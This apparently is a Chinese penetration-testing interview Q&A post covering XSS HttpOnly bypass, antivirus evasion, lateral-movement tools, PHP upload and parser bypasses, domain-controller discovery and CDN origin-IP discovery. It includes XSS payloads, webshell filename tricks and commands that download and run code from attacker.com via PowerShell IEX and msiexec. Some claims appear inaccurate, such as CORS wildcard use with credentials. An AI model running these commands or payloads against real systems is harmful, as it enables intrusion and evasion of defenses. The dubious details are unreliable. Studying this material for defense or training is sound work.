安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

目录

二百四十一、XSS 设置Http-Only如何绕过

二百四十二、XSS攻击手段分类

二百四十三、高杀软覆盖工作组的渗透策略

二百四十四、内网横向工具选型

二百四十五、fscan扫描崩溃处理

二百四十六、Apache/IIS解析漏洞

二百四十七、PHP文件上传绕过

黑名单绕过

白名单绕过

解析漏洞利用

二百四十八、工作组横向权限要求

二百四十九、域控定位方法大全

二百五十、CDN真实IP溯源

二百四十一、xss 设置http-only如何绕过二百四十二、xss攻击手段有哪些二百四十三、遇到全是杀软的工作组怎么办二百四十四、使用什么工具内网横向二百四十五、fscan扫机器崩了怎么办二百四十六、apache iis 解析漏洞是什么二百四十七、php文件上传绕过方式（黑、白名单、解析漏洞）二百四十八、工作组横向需要用户什么权限二百四十九、如何查找域控（尽可能多的方式）二百五十、如何从cdn 真实ip

二百四十一、XSS 设置Http-Only如何绕过

4类绕过技术：

1. 浏览器漏洞利用
   • 特定浏览器版本（如Chrome < v83）存在Document.cookie API绕过漏洞。
2. 跨域劫持（CORS滥用）
   • 利用配置错误的Access-Control-Allow-Origin: *，通过XHR请求带凭证访问目标域：

   javascriptfetch('https://target.com/data', {credentials: 'include'}).then(...)

3. 服务端请求伪造（SSRF+XSS组合）
   • 通过XSS触发内网SSRF，间接获取含Cookie的响应（需存在SSRF漏洞）。
4. 客户端缓存嗅探
   • 读取浏览器缓存中未标记HttpOnly的敏感数据（如localStorage中的Token）。

---

二百四十二、XSS攻击手段分类

5大攻击类型及代表手法：

类型	原理	案例
反射型XSS	恶意脚本通过URL参数注入	http://site.com?search=<script>alert(1)</script>
存储型XSS	脚本持久化存储到数据库	评论区植入恶意JS，影响所有访问者
DOM型XSS	前端JS解析漏洞导致执行	eval(location.hash.slice(1))
盲打XSS	攻击后台管理界面	表单字段注入，等待管理员触发
mXSS	HTML解析变异导致过滤失效	<img src="x" onerror=alert(1)> 被错误净化

---

二百四十三、高杀软覆盖工作组的渗透策略

免杀与隐蔽渗透方案：

1. 无文件攻击
   • PowerShell内存加载：

     powershellIEX(New-Object Net.WebClient).DownloadString('http://attacker.com/amsi-bypass.ps1') 

2. 合法工具滥用（LOLBAS）
   • 使用微软签名的二进制文件执行操作：

     cmdmsiexec /i http://attacker.com/payload.msi /quiet

3. 网络层隐蔽
   • 使用ICMP/DNS隧道通信（工具：DNSCat2）。
4. 进程注入
   • 注入到可信进程（如explorer.exe ）绕过内存扫描。
5. 硬件级后门
   • 利用网卡固件漏洞（如Intel NIC）实现持久化。

---

二百四十四、内网横向工具选型

按场景匹配工具：

目标	推荐工具	关键参数
主机发现	arp-scan, nmap -sn	--localnet 扫描本地网段
服务爆破	Hydra, Medusa	-L user.txt -P pass.txt smb://
票据传递	Impacket-psexec	-k -no-pass 使用Kerberos票据
漏洞利用	Metasploit, CobaltStrike	use exploit/windows/smb/psexec
隐蔽通信	CobaltStrike Beacon	HTTPS监听+SOCKS代理

---

二百四十五、fscan扫描崩溃处理

稳定性优化方案：

1. 限制并发与超时

   bash./fscan -h 192.168.1.0/24 -t 64 -timeout 3 

   • -t 64：线程数≤64
   • -timeout 3：单主机超时3秒
2. 分片扫描

   bashsplit -l 100 targets.txt && for i in x*; do ./fscan -hf $i; done 

3. 内存释放优化
   • 使用ulimit -v unlimited解除内存限制。
4. 分布式扫描
   • 将目标列表分割到多台VPS执行。

---

二百四十六、Apache/IIS解析漏洞

服务器解析漏洞详解：

服务器	漏洞版本	利用方式
Apache	1.x/2.x（配置错误）	上传test.php.jpg 触发PHP执行
IIS 6.0	Win2003	/shell.asp;.jpg 执行ASP代码
IIS 7.0+	配置FastCGI错误	上传.php文件改名为shell.jpg/.php
Nginx	<0.8.37	shell.jpg%00.php 截断解析

---

二百四十七、PHP文件上传绕过

黑白名单对抗技术：

黑名单绕过

1. 后缀大小写变形：Shell.PhP
2. 双写后缀：shell.pphphp → 过滤后为shell.php
3. 特殊后缀：.phtml, .php5, .phar

白名单绕过

1. %00截断：shell.jpg%00.php （需PHP<5.3.4）
2. 路径拼接：

   phpmove_uploaded_file($_FILES["file"]["tmp_name"], "/uploads/" . $_GET["dir"] . "/" . $filename);

   通过?dir=shell.php%00 截断

解析漏洞利用

• 结合Apache多后缀解析：shell.php.xxx → 若.xxx未定义，则向前识别为PHP

---

二百四十八、工作组横向权限要求

必需的最小权限：

1. SMB协议
   • 目标主机的本地管理员凭证（或SMB共享写入权限）。
2. WMI执行
   • 本地管理员权限 + 防火墙放行135/445端口。
3. PsExec
   • 管理员凭据 + ADMIN$共享访问权限。
4. 计划任务
   • 需加入本地管理员组（或Task Scheduler服务权限）。

---

二百四十九、域控定位方法大全

7种高效定位技术：

1. DNS查询

   powershellnslookup -type=SRV _ldap._tcp.dc._msdcs.domain.com 

2. 端口扫描
   • 定位389（LDAP）/636（LDAPS）/88（Kerberos）端口开放主机。
3. NetBIOS信息

   cmdnbtstat -A 192.168.1.1 # 查找<1C>记录（域控制器） 

4. 活动目录模块

   powershellGet-ADDomainController -Discover -Service PrimaryDC 

5. 日志分析
   • 事件ID 4662（对象访问日志）中定位CN=Domain Controllers。
6. SPN扫描

   bashsetspn -T domain.com -Q */*

7. 默认组策略路径
   • \\domain.com\SYSVOL\domain.com\Policies 仅域控可写。

---

二百五十、CDN真实IP溯源

6层探测技术：

1. 历史DNS记录
   • 查询securitytrails.com 获取历史A记录。
2. 子域名爆破
   • 使用amass扫描未接入CDN的子域（如test.example.com ）。
3. SSL证书匹配
   • 通过crt.sh 搜索相同证书的IP。
4. 邮件服务器溯源
   • 分析邮件头Received字段中的原始IP。
5. 协议漏洞探测
   • 发送HTTP 1.0请求或异常Host头（如Host: 127.0.0.1）触发CDN转发错误。
6. 全球Ping监测
   • 通过viewdns.info 对比全球节点响应差异。